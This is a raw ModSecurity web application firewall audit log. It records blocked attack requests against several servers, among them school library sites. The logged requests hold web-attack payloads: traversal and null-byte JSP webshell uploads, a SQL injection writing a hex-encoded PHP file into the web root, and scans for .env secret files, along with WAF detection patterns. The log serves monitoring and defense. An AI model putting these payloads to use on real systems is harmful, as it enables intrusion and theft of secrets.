Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53e5ad00-Z-- --059bcd5c-A-- [22/May/2025:14:33:38 +0700] aC7TUiektx75wRFPQyjrWQAAANM 103.236.140.4 32880 103.236.140.4 8181 --059bcd5c-B-- POST /mp/login/../uploadControl/uploadFile HTTP/1.0 Host: 218.95.66.214 X-Real-IP: 45.32.66.146 X-Forwarded-Host: 218.95.66.214 X-Forwarded-Server: 218.95.66.214 X-Forwarded-For: 45.32.66.146 X-Forwarded-Proto: https Connection: close Content-Length: 303 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoDIsCqVMmF83ptmp --059bcd5c-C-- ------WebKitFormBoundaryoDIsCqVMmF83ptmp Content-Disposition: form-data; name="file"; filename="test.jsp" Content-Type: application/octet-stream clyvxpyjtc ------WebKitFormBoundaryoDIsCqVMmF83ptmp Content-Disposition: form-data; name="submit" 上传 ------WebKitFormBoundaryoDIsCqVMmF83ptmp --059bcd5c-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --059bcd5c-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||218.95.66.214|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747899218492491 3031 (- - -) Stopwatch2: 1747899218492491 3031; combined=2031, p1=357, p2=1604, p3=22, p4=22, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --059bcd5c-Z-- --aec3cb43-A-- [22/May/2025:14:33:40 +0700] aC7TVOThJmFSRJ5-OZfApAAAAEg 103.236.140.4 32896 103.236.140.4 8181 --aec3cb43-B-- POST /portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../rnybpglt.jsp%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 10 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/octet-stream X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 168484116 --aec3cb43-C-- file error --aec3cb43-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aec3cb43-E-- --aec3cb43-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:filename outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:filename=../rnybpglt.jsp\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747899220485044 3552 (- - -) Stopwatch2: 1747899220485044 3552; combined=1673, p1=543, p2=1096, p3=0, p4=0, p5=34, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aec3cb43-Z-- --e87e624f-A-- [22/May/2025:14:33:41 +0700] aC7TVX0O04WKE1HJ5iRhCwAAABA 103.236.140.4 32916 103.236.140.4 8181 --e87e624f-B-- GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.0 Host: 222.77.136.93 Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0 X-Real-IP: 45.32.66.146 X-Forwarded-Host: 222.77.136.93 X-Forwarded-Server: 222.77.136.93 X-Forwarded-For: 45.32.66.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Upgrade-Insecure-Requests: 1 --e87e624f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e87e624f-E-- --e87e624f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||222.77.136.93|F|2"] [data "Matched Data: 3');select unhex('3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b') into outfile '.\x5c\x5c..\x5c\x5c..\x5c\x5cWebRoot\x5c\x5cplom.xgi' found within MATCHED_VAR: 3');select unhex('3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b') into outfile '.\x5c\x5c..\x5c\x5c..\x5c\x5cWebRoot\x5c\x5cplom.xgi'"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747899221488926 3365 (- - -) Stopwatch2: 1747899221488926 3365; combined=2369, p1=374, p2=1968, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e87e624f-Z-- --f4cbc74d-A-- [22/May/2025:14:33:41 +0700] aC7TVeThJmFSRJ5-OZfApwAAAEA 103.236.140.4 32922 103.236.140.4 8181 --f4cbc74d-B-- POST /uapws/saveDoc.ajax?ws=/../../fyw6z.jspx%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 314 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 162990470 --f4cbc74d-C-- content= out.println("vsilhmpzse");new java.io.File(application.getRealPath(request.getServletPath())).delete(); --f4cbc74d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4cbc74d-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:ws outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:ws=/../../fyw6z.jspx\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747899221490272 4465 (- - -) Stopwatch2: 1747899221490272 4465; combined=3016, p1=403, p2=2583, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4cbc74d-Z-- --1c85f836-A-- [22/May/2025:14:33:41 +0700] aC7TVeThJmFSRJ5-OZfAqAAAAFQ 103.236.140.4 32926 103.236.140.4 8181 --1c85f836-B-- POST /portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename=wahaaqzbta.jsp%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 27 User-Agent: Apache-HttpClient/5.2.1 (Java/1.8.0_202) Accept: */* Accept-Language: en Content-Encoding: UTF_8 Content-Type: application/octet-stream serverEnable: localserver X-Forwarded-For: 45.32.66.146 Cookie: LA_K1=langid X-Varnish: 168484119 --1c85f836-C-- 2xQufet7slhcePnWnsiM5YP4rrJ --1c85f836-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c85f836-E-- --1c85f836-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:filename outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:filename=wahaaqzbta.jsp\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747899221492733 3576 (- - -) Stopwatch2: 1747899221492733 3576; combined=2163, p1=908, p2=1227, p3=0, p4=0, p5=27, sr=80, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c85f836-Z-- --e4bb0552-A-- [22/May/2025:14:41:01 +0700] aC7VDWfriXjg62qQwE9RGQAAAIk 103.236.140.4 34546 103.236.140.4 8181 --e4bb0552-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --e4bb0552-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4bb0552-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899661586475 787 (- - -) Stopwatch2: 1747899661586475 787; combined=328, p1=289, p2=0, p3=0, p4=0, p5=39, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4bb0552-Z-- --c2303550-A-- [22/May/2025:14:41:02 +0700] aC7VDuThJmFSRJ5-OZfB0QAAAEs 103.236.140.4 34554 103.236.140.4 8181 --c2303550-B-- GET /.env.staging.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --c2303550-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2303550-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899662260189 832 (- - -) Stopwatch2: 1747899662260189 832; combined=381, p1=341, p2=0, p3=0, p4=0, p5=40, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2303550-Z-- --f16da31f-A-- [22/May/2025:14:41:04 +0700] aC7VEGfriXjg62qQwE9RHgAAAIs 103.236.140.4 34566 103.236.140.4 8181 --f16da31f-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --f16da31f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f16da31f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899664312234 766 (- - -) Stopwatch2: 1747899664312234 766; combined=293, p1=257, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f16da31f-Z-- --a26b5f5a-A-- [22/May/2025:14:41:06 +0700] aC7VEmfriXjg62qQwE9RJAAAAJQ 103.236.140.4 34580 103.236.140.4 8181 --a26b5f5a-B-- GET /.env.sandbox HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --a26b5f5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a26b5f5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899666356018 774 (- - -) Stopwatch2: 1747899666356018 774; combined=323, p1=289, p2=0, p3=0, p4=0, p5=34, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a26b5f5a-Z-- --7c77eb12-A-- [22/May/2025:14:41:08 +0700] aC7VFGfriXjg62qQwE9RKgAAAJA 103.236.140.4 34592 103.236.140.4 8181 --7c77eb12-B-- GET /.env.default HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --7c77eb12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c77eb12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899668412882 780 (- - -) Stopwatch2: 1747899668412882 780; combined=306, p1=266, p2=0, p3=0, p4=0, p5=39, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c77eb12-Z-- --7ee1044c-A-- [22/May/2025:14:41:09 +0700] aC7VFWfriXjg62qQwE9RLQAAAIA 103.236.140.4 34598 103.236.140.4 8181 --7ee1044c-B-- GET /prod/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --7ee1044c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ee1044c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899669101550 763 (- - -) Stopwatch2: 1747899669101550 763; combined=321, p1=266, p2=0, p3=0, p4=0, p5=55, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ee1044c-Z-- --90667529-A-- [22/May/2025:14:41:10 +0700] aC7VFmfriXjg62qQwE9RMQAAAIc 103.236.140.4 34606 103.236.140.4 8181 --90667529-B-- GET /.env.preprod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --90667529-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90667529-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899670471511 726 (- - -) Stopwatch2: 1747899670471511 726; combined=307, p1=267, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90667529-Z-- --b5623312-A-- [22/May/2025:14:41:11 +0700] aC7VF-ThJmFSRJ5-OZfB1QAAAFc 103.236.140.4 34612 103.236.140.4 8181 --b5623312-B-- GET /build/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --b5623312-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5623312-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899671152473 537 (- - -) Stopwatch2: 1747899671152473 537; combined=211, p1=184, p2=0, p3=0, p4=0, p5=27, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5623312-Z-- --2a769e54-A-- [22/May/2025:14:47:04 +0700] aC7WeGfriXjg62qQwE9SqwAAAI8 103.236.140.4 35612 103.236.140.4 8181 --2a769e54-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.161.49.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.161.49.48 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2a769e54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a769e54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747900024019773 1998 (- - -) Stopwatch2: 1747900024019773 1998; combined=1005, p1=321, p2=657, p3=0, p4=0, p5=26, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a769e54-Z-- --921e9006-A-- [22/May/2025:14:56:10 +0700] aC7YmmfriXjg62qQwE9TIQAAAIs 103.236.140.4 35996 103.236.140.4 8181 --921e9006-B-- POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=mluhmcfe.jsp&filename=1.jpg HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 250 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: zh-CN,zh;q=0.9 Content-Type: multipart/form-data Upgrade-Insecure-Requests: 1 X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 159421967 --921e9006-C-- ------WebKitFormBoundary92pUawKc Content-Disposition: form-data; name="myFile";filename="test.jpg" <% out.println("fooiqjzoyn");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> 
------WebKitFormBoundary92pUawKc-- --921e9006-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --921e9006-H-- Message: Multipart parsing error (init): Multipart: Boundary not found in C-T. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart: Boundary not found in C-T."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Message: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_STRICT_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "30"] [id "210240"] [rev "4"] [msg "COMODO WAF: Multipart request body failed strict validation: PE 1, BQ 0, BW 0, DB 0, DA 0, HF 0, LF 0, SM , IQ 0, IH 0, FLE 0||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747900570557033 5621 (- - -) Stopwatch2: 1747900570557033 5621; combined=4539, p1=411, p2=4095, p3=0, p4=0, p5=32, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --921e9006-Z-- --2c59497c-A-- [22/May/2025:15:04:23 +0700] aC7ah2friXjg62qQwE9ThQAAAJY 103.236.140.4 36386 103.236.140.4 8181 --2c59497c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.235.185.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.235.185.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2c59497c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c59497c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747901063938033 2983 (- - -) Stopwatch2: 1747901063938033 2983; combined=1308, p1=444, p2=829, p3=0, p4=0, p5=35, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
